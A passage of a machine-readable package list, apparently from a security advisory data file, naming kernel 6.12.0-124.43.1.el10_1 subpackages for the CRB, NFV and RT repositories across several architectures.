"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
